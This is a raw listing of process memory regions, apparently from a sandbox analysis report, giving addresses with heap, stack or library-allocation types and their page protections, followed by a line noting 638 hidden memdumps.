page read and write
16FEB8BA000
heap
page read and write
8B0000
trusted library allocation
page execute and read and write
16FF0E90000
heap
page read and write
8F7000
heap
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
1CCF6479000
heap
page read and write
16FF0EC5000
heap
page read and write
26C1000
trusted library allocation
page read and write
2650000
trusted library allocation
page read and write
6F30000
trusted library allocation
page execute and read and write
1CCF6795000
heap
page read and write
1CC80C33000
trusted library allocation
page read and write
16FEBF1A000
heap
page read and write
33EF000
stack
page read and write
16FF0CC0000
trusted library allocation
page read and write
392F000
stack
page read and write
16FF0C05000
trusted library allocation
page read and write
6A1E000
stack
page read and write
24C0279000
stack
page read and write
24C110D000
stack
page read and write
FFE000
stack
page read and write
2B6E000
stack
page read and write
A22B000
stack
page read and write
CBF000
stack
page read and write
1CCF66D0000
heap
page read and write
1CCF6754000
heap
page read and write
16FEB630000
heap
page read and write
7E85000
trusted library allocation
page read and write
16FF0C54000
trusted library allocation
page read and write
83D000
trusted library allocation
page execute and read and write
27BF000
trusted library allocation
page read and write
B0E000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7FFD9B800000
trusted library allocation
page read and write
1CC90010000
trusted library allocation
page read and write
16FEC190000
trusted library allocation
page read and write
16FF0BF1000
trusted library allocation
page read and write
5280000
trusted library allocation
page execute and read and write
5060000
trusted library allocation
page execute and read and write
4D3E000
heap
page read and write
ACA000
heap
page read and write
4EB0000
heap
page read and write
729E000
stack
page read and write
48FB000
stack
page read and write
8AB000
heap
page read and write
1CC81610000
trusted library allocation
page read and write
911000
heap
page read and write
E2E000
stack
page read and write
4D39000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
9B00000
heap
page read and write
1CCF65C0000
heap
page execute and read and write
7FFD9B920000
trusted library allocation
page execute and read and write
857000
trusted library allocation
page execute and read and write
2620000
trusted library allocation
page read and write
16FF0E55000
heap
page read and write
ACE000
stack
page read and write
778000
stack
page read and write
860000
heap
page read and write
28AE000
trusted library allocation
page read and write
80000
unkown
page readonly
16FEB840000
heap
page read and write
1CCF6765000
heap
page read and write
5070000
heap
page read and write
16FF0D00000
trusted library allocation
page read and write
1CCF65C7000
heap
page execute and read and write
D745F9000
stack
page read and write
9D0E000
stack
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
16FEBF1A000
heap
page read and write
3C0F000
trusted library allocation
page read and write
DA0000
heap
page execute and read and write
5050000
trusted library allocation
page execute and read and write
1CCF43C0000
heap
page read and write
1CCF64ED000
heap
page read and write
4A80000
trusted library allocation
page execute and read and write
4FF0000
trusted library allocation
page read and write
24C11CE000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
D749FB000
stack
page read and write
2778000
trusted library allocation
page read and write
16FF1250000
trusted library allocation
page read and write
1CCF6758000
heap
page read and write
27F0000
heap
page read and write
9C4000
heap
page read and write
24BFBE3000
stack
page read and write
6E6F000
stack
page read and write
16FEB710000
heap
page read and write
16FF1240000
trusted library allocation
page read and write
24C03BD000
stack
page read and write
16FF0C30000
trusted library allocation
page read and write
4D1B000
stack
page read and write
90D000
stack
page read and write
5002000
trusted library allocation
page read and write
E80000
heap
page read and write
2606000
trusted library allocation
page read and write
16FF0CEC000
trusted library allocation
page read and write
5272000
trusted library allocation
page read and write
7FFD9B932000
trusted library allocation
page read and write
16FF0CF7000
trusted library allocation
page read and write
1CC81AF4000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
24C06BB000
stack
page read and write
There are 638 hidden memdumps, click here to show them.